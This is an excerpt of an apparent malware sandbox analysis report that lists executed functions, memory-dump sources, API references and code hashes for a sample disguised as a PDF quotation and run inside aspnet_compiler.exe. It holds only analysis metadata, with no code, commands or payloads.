Instruction Fuzzy Hash: 06522C30B18A498FEB98EF2CC458B69B7E1FF99310F5441B9E04DC76A6DE74E8418B41

Function 00007FF7C106BED3 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1926612021.00007FF7C1060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1060000_QUOTATION_NOVQTRA071244PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0bcb6fe968b8b6bca64e225e70a8831f3a6509b078960dec911284198b9f85a
Instruction ID: 84891a839c83d3359bba00d0ddcc67c3da3739fae530b98a7ebac59a3d908039
Opcode Fuzzy Hash: c0bcb6fe968b8b6bca64e225e70a8831f3a6509b078960dec911284198b9f85a
Instruction Fuzzy Hash: F8411623A18A5627DB02BBBCBD462FD7740EF41374B448676D24CD91578E38B886CEC9

Analysis Process: aspnet_compiler.exePID: 6180, Parent PID: 7628COMMON

Execution Graph

Execution Coverage:	21.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	60
Total number of Limit Nodes:	2

Executed Functions

Function 000001E56C24299C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001E56C242A0F

Memory Dump Source

Source File: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E56C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e56c220000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
Instruction ID: 44addb7ad66c787dd2db61f180f931672102c5cb46cd5d1c4f590cb6d2235425
Opcode Fuzzy Hash: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
Instruction Fuzzy Hash: DFC19870A14E454BEB5DEA29C4857FDB3D2FBDC308F9583A9DC8AC7186DB20D9428681

Function 00007FF7C110761A Relevance: 1.1, Instructions: 1110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91c796d5be7497de10dabb42e7f6f183b02aff9da94efb8a8ea155fd6c02d30
Instruction ID: f6199a678ed7fcad89fb6ac75bec99c2864381111a4e06030f66fc30c1936f24
Opcode Fuzzy Hash: b91c796d5be7497de10dabb42e7f6f183b02aff9da94efb8a8ea155fd6c02d30
Instruction Fuzzy Hash: F4A21970D086198FDB99EF18D894BA9BBB1FF59310F6041E9D04DE7291CB79AA81CF10

Function 00007FF7C110692A Relevance: 1.0, Instructions: 1020
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2e8b4d841fedbb254112a1f55c7e45245d1f42b37d367b8d4385201d00d20e
Instruction ID: 0b4c6aefefc08a703eb2ea887bd315efaaa450955ce29033367e57b0bc85dc3e
Opcode Fuzzy Hash: 8c2e8b4d841fedbb254112a1f55c7e45245d1f42b37d367b8d4385201d00d20e
Instruction Fuzzy Hash: BB82D770D08A5D8FDB99EF18C894BA9B7B1FF59341F6041EAD00DE7291CA75AA81CF10

Function 00007FF7C11098E6 Relevance: .4, Instructions: 450
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 351ba3062d2c37ddd8992769233eb580ba893dd2c4784d1f523c995d1c9a43f6
Instruction ID: e2a5beabbdc92e16d2b209800b3c2a317e4070f70f479d2606f0e678587a00dc
Opcode Fuzzy Hash: 351ba3062d2c37ddd8992769233eb580ba893dd2c4784d1f523c995d1c9a43f6
Instruction Fuzzy Hash: 0FF13B70D08A5D8FDB95EF68C894BADB7F1FF59300F5041AAD00DE7292DA78A985CB10

Function 00007FF7C1109E4D Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e746f98251efabc403c35bf87de1e4d3e5279721bbe2c5fba7a5ff6c68f92361
Instruction ID: cf7b4151201edaba5ad0e877fc2056c21e7f5c0c930d07c702b49a298758da04
Opcode Fuzzy Hash: e746f98251efabc403c35bf87de1e4d3e5279721bbe2c5fba7a5ff6c68f92361
Instruction Fuzzy Hash: 42A13530D08A1E8FEB94EF58D854BE9B7A1FF58310F504279D41DE3292CB78A985CB51

Function 00007FF7C110A151 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c229e9233ef9a5ad90e4477642d9056d217a850cf8d2ced7136743f6934a401
Instruction ID: afe4aee692fd04d62d27afb46a478f4a74d05acb87c712cd1c8041fc9d852ed7
Opcode Fuzzy Hash: 8c229e9233ef9a5ad90e4477642d9056d217a850cf8d2ced7136743f6934a401
Instruction Fuzzy Hash: F5011631C1461A8BEB50EF55D4447FDB3B1EF86320F50823AC128A72D5CAB95599CF94

Function 000001E56C242766 Relevance: 4.7, APIs: 3, Instructions: 226
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001E56C242774
SysAllocString.OLEAUT32 ref: 000001E56C242890
SafeArrayDestroy.OLEAUT32 ref: 000001E56C242974

Memory Dump Source

Source File: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E56C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e56c220000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
Instruction ID: 9cbd4859401155096bb889ff85015fb024c303251a3cb97bce92135e029a8845
Opcode Fuzzy Hash: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
Instruction Fuzzy Hash: 1D717D30608E488FDB68EF29C8897AAB7E1FF99305F504669D89BC7151DB30E545CB82

Function 000001E56C2441B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001E56C244282

Strings

l, xrefs: 000001E56C24421C

Memory Dump Source

Source File: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E56C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e56c220000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 6636ab4e07c5a3896f9c83885f113890185dc9fda9a60da2001948db2b2ddc40
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: 45318334918EC58FE799DF2CC044B69BBD5FBA930CF6496ACC8DAC7152D720D8468701

Function 00007FF7C110D48A Relevance: 2.7, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

N, xrefs: 00007FF7C110DB33
P, xrefs: 00007FF7C110DD63

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: N$P
API String ID: 0-533121418
Opcode ID: 8a7ed8f9752ca420e3f284c9ecc1fb5880f2c52d6ae8bc40dd7f0933f51f1b9d
Instruction ID: 7e78080f08e9b47d384046e543ffa45d981a51be0a99c84e1a1fd7a53303bc8c
Opcode Fuzzy Hash: 8a7ed8f9752ca420e3f284c9ecc1fb5880f2c52d6ae8bc40dd7f0933f51f1b9d
Instruction Fuzzy Hash: 4891B271C0961A8FEB69EF10D8556E9B7B0EF51320F5002FED41E972E1DA782A89CF50

Function 000001E56C242728 Relevance: 1.6, APIs: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001E56C242774
SysAllocString.OLEAUT32 ref: 000001E56C242890
SafeArrayDestroy.OLEAUT32 ref: 000001E56C242974

Memory Dump Source

Source File: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E56C220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e56c220000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
Instruction ID: 8e06234b1adaeefd46a71aed85882184495142baf75959f0819b7690a398e1c8
Opcode Fuzzy Hash: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
Instruction Fuzzy Hash: A6415E31618E488FD75CEE25D889AEAB3E5FB99314F40466ED88BC7051EB31E5058BC2

Function 00007FF7C1100863 Relevance: .9, Instructions: 878
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24caa4111d6073ed9ca9294b4d25966c3e63fb6ae35d91393dcb8f1fe1811cd1
Instruction ID: 7c7cf66cbd45c77956b5376d77a0576c77aec3f7dec207ead737d29d557d8169
Opcode Fuzzy Hash: 24caa4111d6073ed9ca9294b4d25966c3e63fb6ae35d91393dcb8f1fe1811cd1
Instruction Fuzzy Hash: 2A623070D08A9D8FEB96EB18C894799BBB1FF59380F9141E6C00DD7296DB359E81CB10

Function 00007FF7C11062D3 Relevance: .8, Instructions: 814
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ecd763a92f6317c7a58bf95540addc15b9693a9731cf0d811abd4e1f51ae6f
Instruction ID: 432ebe6666e26e48a046b8537e8c4923d0692e1bd657cc5facc803adb12ffb24
Opcode Fuzzy Hash: a3ecd763a92f6317c7a58bf95540addc15b9693a9731cf0d811abd4e1f51ae6f
Instruction Fuzzy Hash: 95D1E335E086598FEB15FB68E8417ECB7A0EF85364F5441B6D04CDB292CE387846CBA1

Function 00007FF7C110EA85 Relevance: .5, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5e5293ba476bc4abf3f30ee4c6540e562ab62d64eb0ed17283c9643d938831
Instruction ID: 4e46ebfd0209cdd4aaa0dd9fc3c6c449d54ca12d132b739a1458c31e2eb347c6
Opcode Fuzzy Hash: 6f5e5293ba476bc4abf3f30ee4c6540e562ab62d64eb0ed17283c9643d938831
Instruction Fuzzy Hash: 8E122730D096198FDB58EF58D895BEDB7B2FF58314F6041B9D00EA7286CB79A881CB50

Function 00007FF7C1104992 Relevance: .3, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52250b4f77e8810389d06722c6cb61e341015675edc6216ec6f0f2fb8da83d58
Instruction ID: 527abda838d6558431fa92b351a3ef2af5818269694f2c4e7d81cb5fddd40e60
Opcode Fuzzy Hash: 52250b4f77e8810389d06722c6cb61e341015675edc6216ec6f0f2fb8da83d58
Instruction Fuzzy Hash: 56B13A70D08A5D8FDB95EF68C894BA8BBF1FF59310F5441AAD00DE7692CB74A980CB11

Function 00007FF7C1103542 Relevance: .3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae2ad39df0f06b8f73a558eb8f5ba7370c5a092ce3a3f5839434b2d3706f810
Instruction ID: 84dd0a6e2dfbb535d6fb879c109a771b0e58a3138fad8d11b9997b8220eb0b71
Opcode Fuzzy Hash: 3ae2ad39df0f06b8f73a558eb8f5ba7370c5a092ce3a3f5839434b2d3706f810
Instruction Fuzzy Hash: FDB14C70D18A5D8FDB95EF68C894BA8BBF1FF59300F5441AAD00DE7292CB75A980CB11

Function 00007FF7C110293D Relevance: .3, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfeb78f4ed1f68c9fadc29ba630fe34f0aa12ee023adc13ccafc9dc272cb83c2
Instruction ID: af2af7077a405b938a05ba7e6aa353428f0122fb1203b060a5f906cf46dfd191
Opcode Fuzzy Hash: dfeb78f4ed1f68c9fadc29ba630fe34f0aa12ee023adc13ccafc9dc272cb83c2
Instruction Fuzzy Hash: 1CB14E70E08A5D8FDB95EF58D894BACBBF1FF69310F5041AAD00DE7291DA74A980CB11

Function 00007FF7C1103140 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32bca7604c33908c66a713e28deeee8de8bcd97fcfe75ef02578b55ea6761faf
Instruction ID: a72b0514b25a8609db96efdf9dd0aa94d5aefcc8b2c628290ae95a565fec51ba
Opcode Fuzzy Hash: 32bca7604c33908c66a713e28deeee8de8bcd97fcfe75ef02578b55ea6761faf
Instruction Fuzzy Hash: D0B13A70E18A5C8FDB95EF58D894BACBBF1FF59310F5441AAD00DE7292CA75A980CB10

Function 00007FF7C1103952 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21138542fa4fc4282b682b1096de6e1c744d03092c37c8b5686089b04dbcf42
Instruction ID: 137b54159fd7adf27e7bdb4f14a270f1811c710500348c0b6da1f059451e17de
Opcode Fuzzy Hash: a21138542fa4fc4282b682b1096de6e1c744d03092c37c8b5686089b04dbcf42
Instruction Fuzzy Hash: D5B16170D18A5D8FDB99EF28D894BA8BBF1FF59310F5441AAD00DD7292CB74A980CB11

Function 00007FF7C1103D62 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d68228c773da78036407c009f4d58f6f8b91ccc5bdb1718c028a4d05d8416e8f
Instruction ID: 02503d92f02812e50509d03ecbd26b96f271532382c686cf58b6d095f01e4275
Opcode Fuzzy Hash: d68228c773da78036407c009f4d58f6f8b91ccc5bdb1718c028a4d05d8416e8f
Instruction Fuzzy Hash: E8B14C70D18A5D8FDB95EF68C894BA8BBF1FF59310F5441AAD00DE7292CB74A980CB11

Function 00007FF7C1104172 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f81991b6b39c84c317c68dbbbc20ae0442a603c8bcf3c2ff83c881fb40a4717
Instruction ID: f0340c6ad3155d42badda6f114863b314af913c75dd39552863a0bcc58c9aa1a
Opcode Fuzzy Hash: 6f81991b6b39c84c317c68dbbbc20ae0442a603c8bcf3c2ff83c881fb40a4717
Instruction Fuzzy Hash: 1DB16D70D08A5C8FDB95EF68C894BA8BBF1FF59310F5441AAD00DE7692CB74A980CB11

Function 00007FF7C1104582 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1763389fb35874f5920ec4540ab00c5a5741d1e061cd89a66987c7b7667fc18
Instruction ID: d8fad25a5374f7dfaf1072cc11a00e53ac42fa4510d19804568d93dda994a839
Opcode Fuzzy Hash: b1763389fb35874f5920ec4540ab00c5a5741d1e061cd89a66987c7b7667fc18
Instruction Fuzzy Hash: 0DB16D70D08A5D8FDB95EF68C894BA8BBF1FF59300F5441AAD00DE7692CB75A980CB11

Function 00007FF7C1103100 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae82fedb199e05696c1104948eabb92718866f9125b1bc25d10d350b0348e6c6
Instruction ID: f22af1c425e4a86875b0356f0c6f0548f9363ec74cccfd08f71305ef362647fb
Opcode Fuzzy Hash: ae82fedb199e05696c1104948eabb92718866f9125b1bc25d10d350b0348e6c6
Instruction Fuzzy Hash: 43A16A70E18A588FDB95EF58D8947A8BBF1FF59310F5440BAD00DE7292CA78A980CB10

Function 00007FF7C1101E72 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff984d32c91ce7fc52fa445a5b7d7f373901e7dfb14df3cb54bac6b005e702c
Instruction ID: dc3aaa1fd04188601feea504035690934d96cbd2faee71ee76fce52e7fa66d56
Opcode Fuzzy Hash: 1ff984d32c91ce7fc52fa445a5b7d7f373901e7dfb14df3cb54bac6b005e702c
Instruction Fuzzy Hash: 72912B70E08A4D8FDB95EB6CD894A9DBBF1FF6A350F9101A9D00DD7252DB35A881CB10

Function 00007FF7C1103138 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab24eb3009ec7b4f87d25cdfccffe580c187648bf3431453e58612a853dd1df
Instruction ID: 8d8feb815db9dfbe3fdb20f1582b50d38f39856d3d659268813aaa429655f5c2
Opcode Fuzzy Hash: fab24eb3009ec7b4f87d25cdfccffe580c187648bf3431453e58612a853dd1df
Instruction Fuzzy Hash: 2E914A70E18A5C8FDB99EF58D8947A8BBF1FF59310F5441BAD00DE7292CA74A980CB11

Function 00007FF7C1101E90 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4094759fb455b972cf9553e39a9c02b786b1e5315ba5a7646ba124e7ddfa517d
Instruction ID: decabb41fe2d04d41a5616f5d43f93dcc00ddb7ee95e4bb36905dc21a6ece229
Opcode Fuzzy Hash: 4094759fb455b972cf9553e39a9c02b786b1e5315ba5a7646ba124e7ddfa517d
Instruction Fuzzy Hash: 9C81F870E08A1C8FDB95EB6CD894A9DBBF1FF69350F9101A9D00DD7251DB35A881CB00

Function 00007FF7C1104DA2 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0bb43c526ab1ee5a7263db5c5bb3dfcf7bab2c1e868fd686447d7c2f051be4
Instruction ID: f3aa395ba321f691d22fe049185a050e92442b790ab0230e0348656d07136f71
Opcode Fuzzy Hash: 1a0bb43c526ab1ee5a7263db5c5bb3dfcf7bab2c1e868fd686447d7c2f051be4
Instruction Fuzzy Hash: FF91D870908A5C8FDB94EF68C899BACBBF1FF59310F5441AAD04DE7252CB74A885CB41

Function 00007FF7C1103150 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64271b735c335be690371775148f75a0bc621cddb4a8a73d3874a8d3ac47cfb6
Instruction ID: 82aab8389eb5b6401e8cdf3449da12cf2c5c5aff82f8d3bd5add92fa39e2b220
Opcode Fuzzy Hash: 64271b735c335be690371775148f75a0bc621cddb4a8a73d3874a8d3ac47cfb6
Instruction Fuzzy Hash: 75913B70E18A5C8FDB99EF58D8947A8BBF1FF59310F5440AAD00DE7292CB74A980CB11

Function 00007FF7C1100598 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ec9fa70c4630738bc0442511b883aabb1fedc653060b994bd17cc028c8d7ac
Instruction ID: 6f5826ac7c3ae1cce94cb437e1f52d84244e9ec4c00369df10ead51934f37b8f
Opcode Fuzzy Hash: 36ec9fa70c4630738bc0442511b883aabb1fedc653060b994bd17cc028c8d7ac
Instruction Fuzzy Hash: EC718274A08A1C9FDF94EF68D899BACB7F1FB69311F5041AAD00DE7251DB74A881CB40

Function 00007FF7C110A9F5 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566d60b3da439b705309c4dbd1a9fe688075d8b51b1884a4a29670cee6d0b559
Instruction ID: 15d50bebffddd8d3b229fcef21e18ba75f34d2e83c7c71af5625d1fee34e1c8d
Opcode Fuzzy Hash: 566d60b3da439b705309c4dbd1a9fe688075d8b51b1884a4a29670cee6d0b559
Instruction Fuzzy Hash: 21818131C08A1E8FEB59EF14E841AE9B7F1FF10720F5042BAD40D97291DB786A85CB50

Function 00007FF7C11039D6 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17ac5c1df2948957b4910c18d7493dc63f675983485db1c3795aa03d3957ded
Instruction ID: d1e0a6ee78595f814dd500c408fdf8c978d93b3d8e4ae3e41c338606f5b206a2
Opcode Fuzzy Hash: a17ac5c1df2948957b4910c18d7493dc63f675983485db1c3795aa03d3957ded
Instruction Fuzzy Hash: DD71D870E18A5D8FDB98EF58D894BACBBF1FF59310F5041AAD00DE7251CA75A980CB11

Function 00007FF7C11052A5 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc79054eddae77637a6a224e5a6ce56aba81805c7d58771f574e240f0409919e
Instruction ID: d8e482a29147377ef58af9242cc4803296d2f5f8feaf18bc5a2a5270ae99916a
Opcode Fuzzy Hash: dc79054eddae77637a6a224e5a6ce56aba81805c7d58771f574e240f0409919e
Instruction Fuzzy Hash: 7451E011CAF28B9AE3917E2424AE5BFA7509F4ABA0FE4AD75E04C450D74EECA5044271

Function 00007FF7C1105A09 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be7119ea823300365a7a542b83f22b6dfdb2b6d7927cb04fcc7b2b25465f6fc
Instruction ID: a214176222bcd3b2acd3df6bd264e85ae6a3d88cff6a4d72d41a8cfb4e56cd39
Opcode Fuzzy Hash: 3be7119ea823300365a7a542b83f22b6dfdb2b6d7927cb04fcc7b2b25465f6fc
Instruction Fuzzy Hash: B2516B71C08649CFEB85EF64D4956BDBBB1FF06310FA00079C00AD7292CB79A945CB61

Function 00007FF7C1100738 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

